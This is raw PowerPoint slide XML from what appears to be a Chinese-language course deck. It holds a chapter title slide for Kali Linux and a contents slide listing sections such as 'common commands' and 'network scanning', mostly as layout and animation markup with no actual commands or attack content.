                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="等腰三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10384747" y="2655849"/>
            <a:ext cx="2069408" cy="1546303"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="等腰三角形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-436508" y="2327919"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47928" y="2883669"/>
            <a:ext cx="1612900" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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bldLvl="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
    </p:bld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Text Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071996" y="2766621"/>
            <a:ext cx="3008380" cy="662379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:no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a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="1565050"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="927951"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="982844"/>
              <a:ext cx="1120898" cy="842780"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="927951"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="2471202"/>
            <a:ext cx="1192345" cy="672217"/>
            <a:chOff x="2215144" y="1952311"/>
            <a:chExt cx="1244730" cy="924318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="平行四边形 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="2033848"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="1952311"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="3407000"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="3018134"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="平行四边形 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="3084852"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="3018134"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596626" y="4316986"/>
            <a:ext cx="1192345" cy="677512"/>
            <a:chOff x="2215144" y="4047039"/>
            <a:chExt cx="1244730" cy="931598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="平行四边形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="4135856"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="4047039"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="1582798"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="953426"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4615667" y="1005461"/>
              <a:ext cx="3228975" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.1 常用命令</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="953426"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="组合 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="2508336"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="1647579"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644505" y="1715136"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="平行四边形 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="1647579"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
